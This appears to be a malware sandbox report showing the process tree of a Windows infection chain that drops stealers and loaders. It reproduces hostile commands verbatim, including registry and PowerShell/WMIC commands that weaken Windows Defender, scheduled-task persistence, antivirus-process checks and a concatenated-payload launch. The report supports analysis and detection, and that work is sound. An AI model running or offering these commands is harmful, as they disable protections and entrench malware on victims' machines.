PID 796 wrote to memory of 2088	796	axplong.exe	stealc_default2.exe
PID 796 wrote to memory of 2088	796	axplong.exe	stealc_default2.exe
PID 796 wrote to memory of 2368	796	axplong.exe	needmoney.exe
PID 796 wrote to memory of 2368	796	axplong.exe	needmoney.exe
PID 796 wrote to memory of 2368	796	axplong.exe	needmoney.exe
PID 796 wrote to memory of 2368	796	axplong.exe	needmoney.exe
PID 796 wrote to memory of 1032	796	axplong.exe	penis.exe
PID 796 wrote to memory of 1032	796	axplong.exe	penis.exe
PID 796 wrote to memory of 1032	796	axplong.exe	penis.exe
PID 796 wrote to memory of 1032	796	axplong.exe	penis.exe
PID 796 wrote to memory of 856	796	axplong.exe	bundle.exe
PID 796 wrote to memory of 856	796	axplong.exe	bundle.exe
PID 796 wrote to memory of 856	796	axplong.exe	bundle.exe
PID 796 wrote to memory of 856	796	axplong.exe	bundle.exe
PID 2368 wrote to memory of 2492	2368	needmoney.exe	svchost015.exe
PID 2368 wrote to memory of 2492	2368	needmoney.exe	svchost015.exe
PID 2368 wrote to memory of 2492	2368	needmoney.exe	svchost015.exe
PID 2368 wrote to memory of 2492	2368	needmoney.exe	svchost015.exe
PID 2368 wrote to memory of 2492	2368	needmoney.exe	svchost015.exe
PID 2368 wrote to memory of 2492	2368	needmoney.exe	svchost015.exe
PID 2368 wrote to memory of 2492	2368	needmoney.exe	svchost015.exe
PID 2368 wrote to memory of 2492	2368	needmoney.exe	svchost015.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204

C:\Users\Admin\AppData\Local\Temp\dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
"C:\Users\Admin\AppData\Local\Temp\dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1728

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:796

C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2124

C:\Users\Admin\AppData\Roaming\T3USPjGDkV.exe
"C:\Users\Admin\AppData\Roaming\T3USPjGDkV.exe"
5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Users\Admin\AppData\Roaming\MovqcuUWuS.exe
"C:\Users\Admin\AppData\Roaming\MovqcuUWuS.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2468

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1512

C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe
"C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2528

C:\Users\Admin\AppData\Local\Temp\service123.exe
"C:\Users\Admin\AppData\Local\Temp\service123.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2200

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1768

C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2088

C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
"C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2368

C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2492

C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
"C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032

C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
"C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
"C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2516

C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
"C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2644

C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
"C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2376

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
5⤵
- Loads dropped DLL
PID:2176

C:\Windows\SysWOW64\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2384

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
6⤵
- System Location Discovery: System Language Discovery
PID:2412

C:\Windows\SysWOW64\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
6⤵
PID:2116

C:\Windows\SysWOW64\cmd.exe
cmd /c md 607698
6⤵
- System Location Discovery: System Language Discovery
PID:876

C:\Windows\SysWOW64\findstr.exe
findstr /V "MaskBathroomCompositionInjection" Participants
6⤵
PID:1720

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
6⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
Waters.pif Q
6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2600

C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
6⤵
PID:904

C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2440

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
"C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3020

C:\Users\Admin\AppData\Local\Temp\7zSEA1.tmp\Install.exe
.\Install.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:700

C:\Users\Admin\AppData\Local\Temp\7zS1084.tmp\Install.exe
.\Install.exe /RNXdidDHt "385121" /S
6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
PID:2304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
7⤵
- System Location Discovery: System Language Discovery
PID:880

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
8⤵
- Indirect Command Execution
PID:2408

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
9⤵
- System Location Discovery: System Language Discovery
PID:1992

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
10⤵
- System Location Discovery: System Language Discovery
PID:2344

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
8⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1708

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
9⤵
PID:1228

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
10⤵
PID:2744

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
8⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1448

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
9⤵
PID:2088

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
10⤵
PID:2412

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
8⤵
- Indirect Command Execution
PID:1288

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
9⤵
PID:1928

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
10⤵
PID:1608

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
8⤵
- Indirect Command Execution
PID:2200

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
9⤵
PID:2392

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
10⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
11⤵
PID:2112

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
7⤵
- Indirect Command Execution
PID:2152

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:2260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:46:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\fIQqLZn.exe\" PV /XkfcdidfUWc 385121 /S" /V1 /F
7⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 596
7⤵
- Loads dropped DLL
- Program crash
PID:2384

C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"
4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"
5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3672

C:\Users\Admin\AppData\Local\Temp\qvipgc.exe
"C:\Users\Admin\AppData\Local\Temp\qvipgc.exe"
5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2124

C:\Users\Admin\AppData\Local\Temp\ujqwfi.exe
"C:\Users\Admin\AppData\Local\Temp\ujqwfi.exe"
5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3432

C:\Users\Admin\AppData\Local\Temp\cymaxl.exe
"C:\Users\Admin\AppData\Local\Temp\cymaxl.exe"
5⤵
- Executes dropped EXE
PID:3028

C:\Users\Admin\AppData\Local\Temp\1000308001\33a79e7ec3.exe
"C:\Users\Admin\AppData\Local\Temp\1000308001\33a79e7ec3.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1768

C:\Users\Admin\AppData\Local\Temp\1000309001\e0e4b0e858.exe
"C:\Users\Admin\AppData\Local\Temp\1000309001\e0e4b0e858.exe"
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1604

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
5⤵
PID:852

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1064

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.0.1027602579\2110816763" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1120 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {252f7b1a-c239-4cc0-8962-29c6b2401db6} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 1292 10cd3b58 gpu
7⤵
PID:1820

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.1.437327096\1562837263" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6c564af-d4ca-4369-97fc-f337374f2733} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 1500 fefbf58 socket
7⤵
PID:2024

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.2.394752247\335845047" -childID 1 -isForBrowser -prefsHandle 1936 -prefMapHandle 1932 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 768 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64ddaed3-7880-474a-a1cf-62602e63f64d} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 1948 e64458 tab
7⤵
PID:1036

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.3.729681725\253632892" -childID 2 -isForBrowser -prefsHandle 2880 -prefMapHandle 2844 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 768 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60cda5ee-b166-48d3-a979-0ddfe9f60262} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 2892 1b932c58 tab
7⤵
PID:304

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
5⤵
PID:3536

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3564

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.0.529587111\981819529" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1184 -prefsLen 20847 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f9fac4fc-7584-432e-843d-4a3ae4b2ec31} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 1316 13df5e58 gpu
7⤵
PID:3784

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.1.759062617\1664407727" -parentBuildID 20221007134813 -prefsHandle 1464 -prefMapHandle 1460 -prefsLen 21708 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7bbe644-338d-4cbe-8bc7-51cf8017960b} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 1476 104ec558 socket
7⤵
PID:3848

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.2.1732657575\906158520" -childID 1 -isForBrowser -prefsHandle 852 -prefMapHandle 2024 -prefsLen 21746 -prefMapSize 233496 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2279578-a082-470c-8e56-e947e9e9c45d} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 1976 1987c758 tab
7⤵
PID:1932

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.3.68603979\222571461" -childID 2 -isForBrowser -prefsHandle 2760 -prefMapHandle 2756 -prefsLen 26216 -prefMapSize 233496 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad495844-a7e2-47fe-97cb-fb94ab2a044b} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 2772 1ebd3158 tab
7⤵
PID:1908

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.4.1320173722\1761808361" -childID 3 -isForBrowser -prefsHandle 3632 -prefMapHandle 3628 -prefsLen 26275 -prefMapSize 233496 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c90e8a2-f33e-41b5-a57e-b239a9259b0d} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 3644 20ccf158 tab
7⤵
PID:3572

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.5.352568084\708945022" -childID 4 -isForBrowser -prefsHandle 3844 -prefMapHandle 3848 -prefsLen 26275 -prefMapSize 233496 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {32ec7f1a-691e-400d-8e6c-2784428e3b68} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 3832 20cce558 tab
7⤵
PID:3680

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.6.165078001\309569863" -childID 5 -isForBrowser -prefsHandle 3896 -prefMapHandle 3900 -prefsLen 26275 -prefMapSize 233496 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {844a1723-ea45-41ae-b93d-1bf042e04ecc} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 3824 20f9c158 tab
7⤵
PID:3744

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
5⤵
PID:1952

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
6⤵
PID:1120

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
5⤵
PID:3884

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
6⤵
- Checks processor information in registry
- Modifies registry class
PID:3352

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.0.719623762\638231232" -parentBuildID 20221007134813 -prefsHandle 1192 -prefMapHandle 1184 -prefsLen 21373 -prefMapSize 233556 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2322e2e6-9fbc-485b-8c08-c84f5f69babd} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 1268 116f9c58 gpu
7⤵
PID:4060

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.1.1416341592\437735555" -parentBuildID 20221007134813 -prefsHandle 1468 -prefMapHandle 1464 -prefsLen 22234 -prefMapSize 233556 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03be95d9-3ece-4658-99a8-824ab169917b} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 1480 d71c58 socket
7⤵
PID:3720

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.2.1831142656\2030216326" -childID 1 -isForBrowser -prefsHandle 1920 -prefMapHandle 1828 -prefsLen 22337 -prefMapSize 233556 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4321d7a2-a155-4b1d-aa41-1e9b77192a41} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 1992 19e21658 tab
7⤵
PID:4032

C:\Program Files\Mozilla Firefox\firefox.exe
